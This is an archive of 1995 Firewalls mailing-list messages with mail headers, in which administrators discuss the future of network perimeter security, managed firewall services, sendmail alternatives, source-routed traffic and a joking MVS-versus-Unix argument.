does this all mean? It may mean that there's good mjr> job security in being a computer professional. And perhaps more in being a computer security professional.... mjr> It may mean that mjr> someone is going to look at the situation and announce that we mjr> have no clothes. That would take someone naieve enough to not be entranced in the established paradigm. Perhaps Microsoft? :) mjr> I *HOPE* it means that someone will begin to think of new computer mjr> security paradigms. Who knows what they will be? I don't think we're mjr> going to win the war the way it's going. That depends what our definition of victory is. If your definition is to prevent all but miniscule access from the internal nework to the world, then yes, we'll lose. If your goal is to protect integrity/etc while allowing fluent access, I think I'll be on the winning side. -- BTW - Those going to LISA/USENIX (that's you marcus) - what say you about organizing our own Beer/BOF at some time? Perhaps we all pile into my rented regal and raise security-hell at some local bar. Let me know if you're interested. -- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 "The only way to make a man trustworthy is to trust him" - Henry Stimson From firewalls-owner Wed Sep 13 21:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA20645 for firewalls-outgoing; Wed, 13 Sep 1995 20:42:15 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA20638 for ; Wed, 13 Sep 1995 20:42:12 -0700 Received: from sousa.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0st5AL-0001fRC; Wed, 13 Sep 95 20:40 PDT Received: by sousa.amdahl.com (Smail3.1.28.1 #4) id m0st58V-0003oMC; Wed, 13 Sep 95 20:38 PDT Message-Id: From: jgt10@amdahl.com (John G. Thompson) Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Wed, 13 Sep 1995 20:38:50 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: <199509131728.MAA20468@shade.sctc.com> from "Rick Smith" at Sep 13, 95 12:28:59 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 490 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > ..Sendmail is the only useful mail package out there out there. I'd be happy > to adopt anything which offers me Sendmail functionality in a more secure > fashion.... Have you honestly looked at smail? JGT -- John G. Thompson jgt10@amdahl.com 1-408-992-2088 Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470 [The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opionions of the Amdahl Corporation.] From firewalls-owner Wed Sep 13 21:02:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA20423 for firewalls-outgoing; Wed, 13 Sep 1995 20:34:03 -0700 Received: from suntan.tandem.com (suntan.tandem.com [192.216.221.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA20416 for ; Wed, 13 Sep 1995 20:33:59 -0700 Received: from adm.loc201.tandem.com.loc201.tandem.com by suntan.tandem.com (8.6.12/suntan5.950313) id UAA00182; Wed, 13 Sep 1995 20:32:37 -0700 Received: from vern.loc201.tandem.com by adm.loc201.tandem.com.loc201.tandem.com (4.1/6main.940209) id AA01832; Wed, 13 Sep 95 20:32:37 PDT Received: by vern.loc201.tandem.com (4.1/6leaf.940209) id AA10351; Wed, 13 Sep 95 20:32:36 PDT Date: Wed, 13 Sep 95 20:32:36 PDT Message-Id: <9509140332.AA10351@vern.loc201.tandem.com> To: mclelcl@onto.network.com Subject: Re: Does anyone do remote monitoring Cc: firewalls@greatcircle.com From: pat@tandem.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Alan Hannan writes: > ......... Craig McLellan is rumored to have said: > ] > ] > ] I have a customer who is looking for any firms that provide remote security > ] monitoring. Anyone know of this??? > > Sometime ago, BBN planet announced a product that sounds very similar to > what you are speaking of. As well, MIDnet offers firewall monitoring with > our SecurIt firewall as a value-added service. > Here is the BBN Planet stuff: -pat -- Patrick Mulrooney Tandem Computers --------- BBN Internet Site Patrol No matter how complex your networking environment, your organization needs a reliable way to protect its electronic assets. BBN Planet Internet Site Patrol(SM) provides both the resources and expertise to improve network security and thwart network intruders so you can keep sensitive corporate information and mission-critical data private and still take full advantage of the Internet. Keeping electronic assets safe Most organizations using the Internet know they need to improve their security measures, but what does that really mean? The answer is complex because each organization uses the Internet differently. That's why BBN Planet developed the Internet Site Patrol, the industry's only affordable, professionally managed and monitored Internet security service. Internet Site Patrol tailors a combination of hardware, software, and services to provide exactly the level of network security your organization needs--from denying unauthorized external access to limiting access internally. A unique managed firewall service Through the BBN Internet Site Patrol, BBN Planet builds and manages a unique protective firewall between your network and the Internet--and then guards that boundary against intruders around the clock, 365 days a year. Only BBN Planet proactively manages your connection and provides timely and appropriate response to security and system events, including emergency disconnects. The firewall provides multiple layers of defense against intrusion, allowing internal users access to the Internet, while prohibiting unauthorized inbound connections. Connected to your external router, the firewall is configured to filter and perform other routing functions that foil certain types of attacks. Since all traffic between your internal network and the Internet is routed through the Internet Site Patrol system, only authorized traffic is allowed to pass through. BBN Planet: Your partner in Internet security More than an ordinary security service, the Internet Site Patrol system provides the resources and expertise of BBN Planet in a partnership to improve your network's security. Not only does the Internet Site Patrol system offer training of security liaisons, it provides updates on changes in Internet security and offers enhanced services in response to customer feedback. In addition to the Internet Site Patrol system, BBN Planet provides customized network consulting and implementation services to meet all of your internetworking needs. Highlights * Continuous, automated remote monitoring 24 hours a day * Superior detection to minimize the risks of a break-in * Turnkey solution--a complete service with firewall hardware, software, installation, configuration, integration, management, monitoring, and updates * Timely and appropriate response to security and system events, including emergency disconnect * Comprehensive logging of firewall system activity * Monthly reports summarizing significant system and security events Specifications * Multiple layers of defense: o Firewall filter and routing o Bastion host firewall and application-level gateway with authentication, authorization, monitoring, and logging capabilities o Choke router backup to bastion host * Application-level Internet relays: o TELNET interactive log-in facility that allows users to access other computers on the Internet o File Transfer Protocol (FTP) that allows users to copy files from other computers on the Internet o Simple Mail Transport Protocol (SMTP) that provides electronic mail capabilities o Secondary Domain Name Service (DNS) for Internet host-to-address mapping o NNTP protocol that relays Internet newsgroups to an internal news server o HTTP protocol that allows access to multimedia information on the World Wide Web From firewalls-owner Wed Sep 13 23:02:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA23168 for firewalls-outgoing; Wed, 13 Sep 1995 22:33:42 -0700 Received: from cs.columbia.edu (cs.columbia.edu [128.59.16.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id WAA23161 for ; Wed, 13 Sep 1995 22:33:39 -0700 Received: from ground.cs.columbia.edu (ground.cs.columbia.edu [128.59.10.3]) by cs.columbia.edu (8.6.12/8.6.6) with ESMTP id XAA26908; Wed, 13 Sep 1995 23:45:41 -0400 Received: (from ji@localhost) by ground.cs.columbia.edu (8.6.12/8.6.6) id BAA16689; Thu, 14 Sep 1995 01:32:21 -0400 Date: Thu, 14 Sep 1995 01:32:21 -0400 Message-Id: <199509140532.BAA16689@ground.cs.columbia.edu> From: John Ioannidis To: mah@ic.co.at CC: firewalls@greatcircle.com In-reply-to: (message from Michael Haberler on Wed, 13 Sep 1995 23:11:55 -0100 (GMT-0100)) Subject: Re: IP source routed traffic - how to generate? Reply-To: ji@cs.columbia.edu Organization: Columbia University Department of Computer Science X-Date: 28 Fructidor An CCIII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just RTFM for setsockopt() to set the source route to use. /ji From firewalls-owner Wed Sep 13 23:07:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA23396 for firewalls-outgoing; Wed, 13 Sep 1995 22:46:37 -0700 Received: from hermes.intel.com (hermes.intel.com [143.183.152.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA23389 for ; Wed, 13 Sep 1995 22:46:34 -0700 Received: from argus.intel.com by hermes.intel.com (5.65/10.0i); Wed, 13 Sep 95 22:45:18 -0700 Received: by argus.intel.com (5.65/10.0i); Wed, 13 Sep 95 22:45:17 -0700 From: sedayao@argus.intel.com (Jeffrey C. Sedayao) Message-Id: <9509140545.AA18498@argus.intel.com> Subject: firewall BOF at LISA/USENIX? To: alan@mid.net (Alan Hannan) Date: Wed, 13 Sep 95 22:45:16 PDT Cc: mjr@iwi.com, firewalls@greatcircle.com In-Reply-To: <199509140213.VAA18427@gaijin.mid.net> from "Alan Hannan" at Sep 13, 95 09:13:38 pm X-Mailer: ELM [version 2.4dev PL66] Mime-Version: 1.0 Content-Type: text Content-Length: 775 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [much deleted] > BTW - Those going to LISA/USENIX (that's you marcus) - what say you about > organizing our own Beer/BOF at some time? Perhaps we all pile into my > rented regal and raise security-hell at some local bar. Let me know if you're > interested. Is there going to be a formal firewall BOF there at LISA/USENIX? If so, when (day and time) will it be? If nothing formal, then a Beer/BOF would do, depending on when it would be. > -- > Alan Hannan Email: alan@mid.net > Network Systems Administrator Voice: (402) 472-0239 > MIDnet, Lincoln NOC Office Fax: (402) 472-0240 > > "The only way to make a man trustworthy is to trust him" - Henry Stimson > -- Jeff Sedayao Intel Corporation sedayao@argus.intel.com From firewalls-owner Thu Sep 14 00:02:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA24828 for firewalls-outgoing; Wed, 13 Sep 1995 23:42:27 -0700 Received: from hermes.intel.com (hermes.intel.com [143.183.152.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA24820 for ; Wed, 13 Sep 1995 23:42:23 -0700 Received: from argus.intel.com by hermes.intel.com (5.65/10.0i); Wed, 13 Sep 95 23:41:08 -0700 Received: by argus.intel.com (5.65/10.0i); Wed, 13 Sep 95 23:41:07 -0700 From: sedayao@argus.intel.com (Jeffrey C. Sedayao) Message-Id: <9509140641.AA18659@argus.intel.com> Subject: Re: Firewall off Mortal Kombat XIV To: mjr@iwi.com Date: Wed, 13 Sep 95 23:41:06 PDT Cc: firewalls@greatcircle.com In-Reply-To: <199509140034.UAA16397@switchblade.iwi.com> from "Marcus J. Ranum" at Sep 13, 95 08:34:55 pm X-Mailer: ELM [version 2.4dev PL66] Mime-Version: 1.0 Content-Type: text Content-Length: 4456 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [stuff deleted] > problems I believe we (the security dweebs of the world) are going > to face in the next 5 years: > 1) The notion of "network perimeter" will erode to the point > where saying "protect all access into and out of your network" > will be greeted with hysterical giggles. Right now when I > say that many of my customers just look at me with a glazed > eyed expression as if to say, "pull the other one." I agree. It is getting easier and easier for holes to be punched through a large corporate "network perimeter". In my opinion (and unfortunate experience), insiders are probably the ones who will do the hole punching. > 2) IPV6 will not save us. I don't expect that all the new > IP-based toaster ovens, Sega machines, and clock radios > are going to talk V6. By the time V6 actually exists, the > installed base will be too large to replace. To help get > your brain around the problem, consider the reaction if > someone suggested that the US change over to 220 volt > European power grids. > 3) The number of new network-aware and IP-aware apps is > now on an exponential growth curve. Consider, for a moment, > how the typical network app is developed today: > Version 1: no security > Version 2: security? next version > Version 3: something lame > With the increase in network-permeation, the actual number > of things that "get it right" will be close to zero. It would probably take a number of drastic problems with a few network apps (like injuries or deaths or massive financial loss) before people get really serious about getting security into apps. > 4) I used to worry that the government's myopic views > on cryptography were going to keep us from building good > high-integrity APIs and tools into our infrastrcture. > Now I realize I was naive: it is *TOO* *LATE* to fix it; > it has gotten too big. > What does this all mean? It may mean that there's good > job security in being a computer professional. It may mean that > someone is going to look at the situation and announce that we > have no clothes. I *HOPE* it means that someone will begin to > think of new computer security paradigms. Who knows what they > will be? I don't think we're going to win the war the way it's > going. I would say that events above will force the following: 1. Instead of really on one big network perimeter in an organization, there will evolve many different ones and multiple layers of perimeters. There will be an outer one, and several perimeters around various critical components. This is analagous to the multilayered physical security some large companies have. The company headquarters will have physical barriers outside of its entrance to prevent crude attacks like a car bomb attack. To get inside of the building, you will need a badge or other token. Within that building, there will be several secured areas that are limited to people with passcodes, keys, or specific other tokens. Firewalls (or network perimeters) will be in multiple places and in multiple levels within the organization. In other words, organizations will no longer grow to be "crunchy on the outside but soft on the inside". They will become crunchy on the outside, soft in some places inside, but also crunchy again in certain places on the inside. 2. Individual applications and hosts will become more hardened and secure. For old applications, small individual sized "firewall-wrappers" will become available. As the network perimeter erodes, it has to erode to the the point of individual hosts or applications (or sets of hosts and applications). So hosts will either become secure or have some kind of secure wrapper/firewall. I like to think of the analogy of a filing cabinet. If you can't lock it, put it in a room that you can lock. If you can lock it, you can put it in a room that also can be locked. 3. Enlightened companies will provide decent Internet access not only as a competitive measure, but as a way to ensure that its employees don't run off and create their own Internet access in a highly insecure and risky matter. As Brent has pointed out, if people need Net access to get their job done, they are probably going to find a way to get Net access. It's better for a company to do the Internet access job right instead of having employees construct some risky, insecure kluge. > mjr. -- Jeff Sedayao Intel Corporation sedayao@argus.intel.com From firewalls-owner Thu Sep 14 01:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA26113 for firewalls-outgoing; Thu, 14 Sep 1995 00:46:11 -0700 Received: from awadi.com.AU (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA26106 for ; Thu, 14 Sep 1995 00:45:57 -0700 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA19791; Thu, 14 Sep 95 17:12:27 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA11688; Thu, 14 Sep 1995 17:09:51 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9509140739.AA11688@bunya.awadi> Subject: Re: MVS religious war, was MVS vs the world To: zen@flying.fish.com (d) Date: Thu, 14 Sep 1995 17:09:52 +0930 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199509132153.OAA21435@flying.fish.com> from "d" at Sep 13, 95 02:53:43 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to d: > >Ahem. Surely you mean: > Aww c'mon - you should sort the list so the fanatics can find their entry (though, for some it would not matter from what I have seen...) for $OS (sort keys %list_of_OS) { print "$OS people will defend $list_of_OS{$OS} operating system...\n"; } -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Thu Sep 14 02:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA28045 for firewalls-outgoing; Thu, 14 Sep 1995 01:42:25 -0700 Received: from eros.britain.eu.net (eros.Britain.EU.net [192.91.199.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA28038 for ; Thu, 14 Sep 1995 01:42:16 -0700 Received: from airtechsms.co.uk by eros.britain.eu.net with UUCP id ; Thu, 14 Sep 1995 09:40:48 +0100 Received: by airtechsms.co.uk (Smail3.1.28.1 #1) id m0st9GQ-00000jC; Thu, 14 Sep 95 09:03 BST Date: Thu, 14 Sep 1995 09:03:17 +0100 (BST) From: Martin Hepworth X-Sender: max@airtechs To: Firewalls@Greatcircle.COM Subject: Re: MVS v Unix - was:Interpreting CERT advisories In-Reply-To: <199509130255.WAA19687@zork.tiac.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OK then if MVS is so good on TCP/IP how come sendmail on MVS is thick enough to beleive any old FROM: that you tell it, hence the OLGA mail spoofs! Before this gets (!) into a full scale MVS/Unix war let's face every system has holes, just some are better known than others. my 2p Martin ------------------------------------------------------------------ Martin Hepworth, email work: max@airtechsms.co.uk Racal-Airtech, UK email home: mgh@cityscape.co.uk Voice: +44(0)1844 201800 http://www.gold.net/users/ef67/ FAX: +44(0)1844 201832 PGP Key on request Padgetts rule:WYDSIWGY "What you don't see is what gets you". All opinions are mine, mine, all mine................ From firewalls-owner Thu Sep 14 03:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA29434 for firewalls-outgoing; Thu, 14 Sep 1995 02:40:31 -0700 Received: from flying.fish.com (flying.fish.com [140.174.97.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA29420 for ; Thu, 14 Sep 1995 02:40:14 -0700 From: zen@flying.fish.com Received: (from zen@localhost) by flying.fish.com (8.7.1.3 (Alpha)/8.7.1.3) id CAA02217; Thu, 14 Sep 1995 02:27:58 -0700 Message-Id: <199509140927.CAA02217@flying.fish.com> Date: Thu, 14 Sep 1995 02:27:57 -0700 In-Reply-To: blymn@awadi.com.AU (Brett Lymn) "Re: MVS religious war, was MVS vs the world" (Sep 14, 17:09) X-Mailer: Mail User's Shell (7.2.2 4/12/91) To: blymn@awadi.com.AU (Brett Lymn) Subject: Re: MVS religious war, was MVS vs the world Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > According to d: > >Ahem. Surely you mean: > > [...] > Aww c'mon - you should sort the list so the fanatics can find their > entry (though, for some it would not matter from what I have seen...) > for $OS (sort keys %list_of_OS) { > print "$OS people will defend $list_of_OS{$OS} operating system...\n"; > } Unfortunately, that would sort on the first digit of the number of people. Not too useful. -- d From firewalls-owner Thu Sep 14 03:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA00204 for firewalls-outgoing; Thu, 14 Sep 1995 03:24:03 -0700 Received: from awadi.com.AU (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA00195 for ; Thu, 14 Sep 1995 03:23:54 -0700 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA22196; Thu, 14 Sep 95 19:50:57 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA12321; Thu, 14 Sep 1995 19:49:24 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9509141019.AA12321@bunya.awadi> Subject: Re: MVS religious war, was MVS vs the world To: firewalls@greatcircle.com Date: Thu, 14 Sep 1995 19:49:26 +0930 (CST) X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to zen@flying.fish.com: > > >> According to d: >> >Ahem. Surely you mean: >> > [...] >> Aww c'mon - you should sort the list so the fanatics can find their >> entry (though, for some it would not matter from what I have seen...) >> for $OS (sort keys %list_of_OS) { >> print "$OS people will defend $list_of_OS{$OS} operating system...\n"; >> } > >Unfortunately, that would sort on the first digit of the number >of people. Not too useful. > Uh Oh you did not initialise list_of_os, so I assumed it to be something like: %list_of_os = ( "HP Unix", "HPUX", "Solaris 2", "SYSV", "SunOS", "BSD", "SCO", "SCO" ... ); I thought that because you were using an associative array that you weren't going to treat it like a normal [] array - oops :-) -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". From firewalls-owner Thu Sep 14 03:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA00349 for firewalls-outgoing; Thu, 14 Sep 1995 03:29:31 -0700 Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA00336 for ; Thu, 14 Sep 1995 03:29:25 -0700 Received: from haddock.saa-cons.co.uk by smtpgate.saa-cons.co.uk with SMTP (5.65/1.2-eef) id AA15465; Thu, 14 Sep 95 11:25:23 +0100 Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) id AA24238; Thu, 14 Sep 1995 11:29:03 +0100 Date: Thu, 14 Sep 1995 11:29:02 +0100 (BST) From: Dave Roberts To: Firewalls Mailing List Subject: ftpd source for SCO? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am trying to compile a version of the ftpd, on a SCO platform for a client who wants extra logging information. A problem seems to stem from the fact that all source I can get hold of, seems to be written for BSD/OS, FreeBSD or NetBSD, and they make use of fdopen on the socket to create a file stream pointer. SCO doesn't like this, and cores with a memory fault if you try to do an fwrite(2) on this stream. Does anyone know of SVR4 compliant ftpd's that I can get the source for? Or anything else that may help me out? TIA - Dave Dave Roberts | "Just paddling out into big surf is a total Unix Systems Administrator | commitment" * "You can't just call time-out SAA Consultants Ltd | and stroll on back to the beach if you don't Plymouth, UK | like the way things are going" - Point Break From firewalls-owner Thu Sep 14 05:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02404 for firewalls-outgoing; Thu, 14 Sep 1995 04:38:41 -0700 Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA02397 for ; Thu, 14 Sep 1995 04:38:35 -0700 Received: from notes by cbisgate.cbis.com (5.x/SMI-4.1) id AA14007; Thu, 14 Sep 1995 07:37:17 -0400 Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA4051; Thu, 14 Sep 95 07:38:11 -0700 Message-Id: <9509141438.AA4051@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 0FC8B4D1D9CA828C85256237003D0184; Thu, 14 Sep 95 07:38:10 To: firewalls-digest From: Warren Moore Date: 14 Sep 95 7:34:39 EDT Subject: Re: MVS vs the world X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In Firewalls-Digest V4 #525 cjolley@iac.net do say: > I still have mine, but it does not explain what the following code does: > > BALR 3,0 > > BALR 3,3 It's been 20 or so years, but without seeing it could be anything from a basic parsing routine (Reg 0 & 1 were typically input), to a realllly tight loop. By the way guys...we all need to face the fact that there are *some* things the UNIX world will do better than the MVS world, and there are *some* things the MVS world will do better than the UNIX world. For instance, I'm still looking for the first bullet-proof UNIX-based application that will handle OLTP systems of the size demanded by most telecommunications providers. (E.g., an existing long-lines circuit provisioning system that has ONE equipment database (out of 150+ other databases) that is so large it has to be split into 4 separate dbs simply because any other configuration exceeds available VSAM address space...um, and for the non-IBMmers out there, that's Real Big). Client/Server simply doesn't have the grunt to either reliably or speedily handle those sorts of volumes...today. Maybe someday, but not now...and, by the way, the example given is for a real system, written originally at Bell Labs (birthplace of UNIX), and developed in BAL and PL/1 (about 7,000,000 lines of code). Think they knew something? :-) Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Thu Sep 14 05:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA02737 for firewalls-outgoing; Thu, 14 Sep 1995 05:04:21 -0700 Received: from balder.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA02730 for ; Thu, 14 Sep 1995 05:04:16 -0700 Received: (from mail@localhost) by balder.ssds.com (8.6.9/8.6.9.SSDSnet-hub) id GAA14114; Thu, 14 Sep 1995 06:02:55 -0600 Received: from denver(134.127.16.1) by balder via smap (V1.3) id sma014112; Thu Sep 14 06:02:38 1995 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id GAA20551; Thu, 14 Sep 1995 06:02:36 -0600 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id IAA13733; Thu, 14 Sep 1995 08:02:34 -0400 Date: Thu, 14 Sep 1995 08:02:33 -0400 (EDT) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: Bill Husler cc: firewalls@GreatCircle.COM Subject: Re: User Authentication In-Reply-To: <199509131701.AA04818@interlock.mckesson.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 1995, Bill Husler wrote: > I've been being told that most companies are piling their resources > (buck) on the authentication and not using traffic encryption because > they feel that session assumptions is really more difficult that one > would be lead to believe and encryption represents considerable overhead. > Any comments? > Thanks, > Bill I have used the Cray Communication Frame-Relay Encryptor for a customer and they are very happy. The box works for FR WAN's up to T1 > > The opinions expressed here-in are my own. Any similarities between these > opinions and those of any other person - living or not - including my > employer are purely coincidental. ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 From firewalls-owner Thu Sep 14 06:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA03679 for firewalls-outgoing; Thu, 14 Sep 1995 05:55:43 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA03662 for ; Thu, 14 Sep 1995 05:55:37 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA28254; Thu, 14 Sep 1995 08:54:14 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA22598; Thu, 14 Sep 1995 08:54:10 -0400 Message-Id: <9509141254.AA22598@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com Date: Thu, 14 Sep 1995 08:53:03 -0500 Subject: Re: Firewall off Mortal Kombat XIV Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rumour has it that on 13 Sep 95 at 20:34, Marcus J. Ranum said: > What does this all mean? It may mean that there's good > job security in being a computer professional. It may mean that > someone is going to look at the situation and announce that we > have no clothes. I *HOPE* it means that someone will begin to > think of new computer security paradigms. Who knows what they > will be? I don't think we're going to win the war the way it's > going. Call it a hunch, but I suspect somehow you'll be responsible for at least initiating a new security paradigm. You seem to have an exceptional wargaming mindset which, through some obscure lateral thinking, will cause all the pieces to fall into place. Maybe it'll come to you in a dream. :) Time to crack open those de Bono books.... Jim "that's enough hero worship for one day" Carroll -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## The more I learn, the less I know. ## ## Eventually I'll know everything about nothing. ## From firewalls-owner Thu Sep 14 06:31:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA04225 for firewalls-outgoing; Thu, 14 Sep 1995 06:17:08 -0700 Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA04214 for ; Thu, 14 Sep 1995 06:17:01 -0700 Received: by gateway.damark.com; id IAA17406; Thu, 14 Sep 1995 08:15:44 -0500 Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme017385; Thu, 14 Sep 95 08:15:14 -0500 Received: by damark.com (5.65/1.2-eef) id AA11050; Thu, 14 Sep 95 08:14:21 -0500 Message-Id: <9509141314.AA11050@damark.com> From: "william.wells" To: FIREWALLS Subject: Firewall off Mortal Kombat XIV Date: Thu, 14 Sep 95 08:08:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In response to comments by 'mjr' and Jeff (which follow my writings): Haven't we already seen that companies sell to the masses and the masses don't care about security? People want Netscape over any other browser because it has critical mass and allow 'neat' stuff. Hot-Java will be the same: "I want the features". TIS' Gauntlet doesn't currently support secure HTTP so people in my company are getting modems to gain the feature that Gauntlet doesn't handle (by bypassing the firewall). I'm looking for an HP/UX system admin: I looked at tons of resumes yesterday and found lots of DOS/Windows people. That tells me that our upcoming batch of programmers are going to base their programming skills on what PCs have; not great for Corporate security. People are struggling with the concept of changing passwords; makes transferring files between systems too hard. They also complain about having to log into individual applications. People coming from the mainframe shops of the 70s and 80s generally have seen security work; not so with people whose only experience has been single user systems. If the consumer wanted security, programmers would add it. The leading home financial software packages support passwords; why? because the people using their software don't want people snooping. When companies lose market share because of poor security, vendors will add it. This is what has happened with TCP/IP: people demanded it. We have browsers and FTP which understand firewalls and proxies because the vendors know they need to support them. Secure transactions on the Internet are getting high visibility because the credit card companies want to prevent valid card information from being stolen while it is being transmitted on the Internet and they are in a position to do something about it. The problem with perimeters is that people are writing and getting distributed applications which, purposely or accidentally, circumvent security mechanisms. If I can get you to run my package internally (because I'm the leading vendor), then I can add code which either circumvents your firewall or, if I can't do that, breaks a feature which information depositories on the Internet will use so that you will demand that your security people 'let it through'. As for the comment about being 'behind the curve'. The example I use is NFS. It was written to fill a niche and has blossomed into code supported on most any TCP/IP system. There are more secure replacements available but critical mass and lack of widespread support assures they won't generally be used. NFS, itself, has known security holes which, because of its design. Because of its widespread use, its doubtful that it will ever change much. Hence, NFS is 'behind the curve'. It is an insecure application which is a 'de-facto standard' which, fortunately, has such obvious security holes and other management issues that almost all Corporate types can recognize the security risks. Microsoft and Netscape could easily create and distribute insecure applications which put people who protect Corporate information 'behind the curve'. The discussions about embedding carefully crafted micros into Word documents shows how easily that can be done. (I don't mean to single out these 2 vendors, I could have used others just as well). 